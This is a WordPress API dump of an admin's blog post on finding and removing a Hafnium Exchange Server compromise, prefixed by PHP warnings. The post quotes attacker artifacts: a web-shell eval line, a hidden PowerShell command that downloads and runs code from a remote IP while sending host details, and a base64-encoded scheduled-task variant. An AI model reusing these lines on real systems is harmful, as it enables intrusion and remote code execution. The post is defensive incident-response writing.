Warning: The magic method Math_Captcha::__wakeup() must have public visibility in /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php on line 87

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/includes/class-cookie-session.php on line 46

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/includes/class-cookie-session.php on line 49

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/includes/class-cookie-session.php on line 49

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/includes/class-cookie-session.php on line 49

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/includes/class-cookie-session.php on line 49

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/includes/class-cookie-session.php on line 49

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/system-storm/blog.comfine.de/wp-content/plugins/wp-math-captcha/wp-math-captcha.php:87) in /home/system-storm/blog.comfine.de/wp-includes/rest-api/class-wp-rest-server.php on line 1893
{"id":244,"date":"2021-03-09T14:41:18","date_gmt":"2021-03-09T13:41:18","guid":{"rendered":"https:\/\/blog.comfine.de\/?p=244"},"modified":"2021-03-17T08:28:34","modified_gmt":"2021-03-17T07:28:34","slug":"how-to-detect-and-remove-hafnium-intrusion","status":"publish","type":"post","link":"https:\/\/blog.comfine.de\/how-to-detect-and-remove-hafnium-intrusion\/","title":{"rendered":"how to detect and remove hafnium intrusion"},"content":{"rendered":"\n

<\/p>\n\n\n\n

detecting intrusions:<\/strong>
i began with the powershell-script microsoft offered to check if the system could be attacked, but the result of the script was not leading me to the suspicous files.<\/p>\n\n\n\n

so i was checking different folders by hand and looked for new aspx-files, as the document of the BSI<\/a> in germany told me to do. i found aspx-files, which were located in c:\\inetpub\\wwwroot\\aspnet_client\\<\/p>\n\n\n\n

0QWYSEXe.aspx – load.aspx and logaaa.aspx.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

as we can see, there were multiple attacks, starting from 05.03.2021.<\/p>\n\n\n\n

inside the aspfile are external url’s like this:<\/p>\n\n\n\n

ExternalUrl : http:\/\/f\/<script language=“JScrpit“ runat=“server“>funciton Page_Load(){eval(Request[„Load“],“unsafe“);}<\/script><\/p>\n\n\n\n

as i red about zip-files and dumps that would have been uploaded in other cases, i used my favorite file manager total commander<\/a> to search for all files that was changed more than a day ago (cause i installed os-updates already today), but not longer ago than 8 days. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

i recognized some files in C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319 which had the same name than the aspx files but ending with .compiled<\/p>\n\n\n\n

in the same directory were two dll files with suspicious name (App_web_lzeymprh.dll for example) and date.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

„removal“ of the intrusion:<\/strong>
i moved the dll files, the compiled files and also the aspx-files of course to another directory<\/p>\n\n\n\n

a more easy and automatic way, that will check your whole system is to use the free thor lite scanner<\/a>, that i can highly recommend!<\/p>\n\n\n\n

you need to give information like name and email adress to obtain a license-file to use the scanner, but the scanner scans all your system:
it did found all the aspx files in my case, but not the dll-files.<\/p>\n\n\n\n

i checked the task-manager for suspicous processes and found one, indeed, there was a powershell-sub-process of cmd.exe:<\/p>\n\n\n\n

powershell -nop -w hidden -ep bypass -c „IEX (New-Object Net.WebClient).downloadstring(‚http:\/\/188.166.162.201\/update.png?v&mac=00-50-56-00-C1-2F&av=&version=6.3.9600&bit=64-Bit&flag2=True&domain=customers.comfine.de&user=EXCHANGE$&PS=True‘)“<\/em>
i checked it with the process explorer<\/a> – the process was running since 8.3.2021 at 2:57:09 and did E\/A Read more than 73.000.000 bytes.<\/p>\n\n\n\n

this ip-adress is located in the USA. <\/p>\n\n\n\n

i installed all patches for the exchange server, includig the last one from march.<\/p>\n\n\n\n

after a reboot the powershell process was there again!<\/p>\n\n\n\n

on my system i could find a planned task, that starts this powershell-command:<\/p>\n\n\n\n

powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBjAGgAYQB0AGMAZABuAC4AbgBlAHQALwBwAD8AaABpAGcAMgAxADAAMwAwADUAJwApAA==<\/em><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

i deleted the planned task and killed th process.<\/p>\n\n\n\n

i also scanned the drive for files containing the ip-address with my favorite file manager total commander:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

so if you are not sure if some files have been transferred, maybe you can check the logfiles system32\\winevt\\logs\\Windows PowerShell.evtx<\/p>\n\n\n\n

by the way, also the thor-lite scanner did register the powershell-execution, as you can see while my search found the txt logfile on my download-folder, but unfortunatelly it was not mentioned in the human easy readble html-log result.<\/p>\n\n\n\n

in the txt file following data was logged:<\/p>\n\n\n\n

Mar 9 10:29:29 Exchange\/148.xxx.xxx.xxx THOR: Info: MODULE: ProcessCheck MESSAGE: Process info SCANID: S-8DAnIqx3lyo PID: 11888 PPID: 12284 PARENT: NAME: cmd.exe OWNER: NT-AUTORIT\u00c4T\\SYSTEM COMMAND: „C:\\windows\\system32\\cmd.exe“ \/c powershell -nop -w hidden -ep bypass -c „IEX (New-Object Net.WebClient).downloadstring(‚http:\/\/188.166.162.201\/update.png?v&mac=00-50-56-00-C1-2F&av=&version=6.3.9600&bit=64-Bit&flag2=True&domain=customers.comfine.de&user=EXCHANGE$&PS=True‘)“ PATH: C:\\windows\\system32\\cmd.exe CREATED: Mon Mar 8 02:57:08 2021 MD5: 622d21c40a25f9834a03bfd5ff4710c1 CONNECTION_COUNT: 0 LISTEN_PORTS: FILE_1: C:\\windows\\system32\\cmd.exe EXISTS_1: yes CREATED_1: Wed Jun 3 10:16:43 2015 MD5_1: 622d21c40a25f9834a03bfd5ff4710c1 SHA1_1: 98a9ac93fe31f38f47f38db78bf12fa0c6214f9a SHA256_1: 48985b22a895154cc44f9eb77489cfdf54fa54506e8ecaef492fe30f40d27e90 FIRSTBYTES_1: 4d5a90000300000004000000ffff0000b8000000<\/p>\n\n\n\n

this article is no guarantee that there is nothing left on the system! i will now do further analyzis and will update this article, if theres some useful information.<\/p>\n\n\n\n

next step will be now, to try the safety scanner<\/a> that microsoft published in january this year and update recently.
small update: the ms scanner did find NOTHING, no surprise, i didnt expect microsoft to provide a useful tool anyway…..
one more update: seems as the scanner was not executed correctly the first time – within the next run, it could find some infections and removed them… so the scanner seems to be worth a try<\/p>\n\n\n\n

good luck with your exchange-systems! and dont forget to leave a comment and a thank you! \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"

detecting intrusions:i began with the powershell-script microsoft offered to check if the system could be attacked, but the result of the script was not leading me to the suspicous files. so i was checking different folders by hand and looked for new aspx-files, as the document of the BSI in germany told me to do.… <\/p>\n

Read More<\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-244","post","type-post","status-publish","format-standard","hentry","category-it"],"_links":{"self":[{"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/posts\/244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/comments?post=244"}],"version-history":[{"count":7,"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/posts\/244\/revisions"}],"predecessor-version":[{"id":287,"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/posts\/244\/revisions\/287"}],"wp:attachment":[{"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/media?parent=244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/categories?post=244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.comfine.de\/wp-json\/wp\/v2\/tags?post=244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}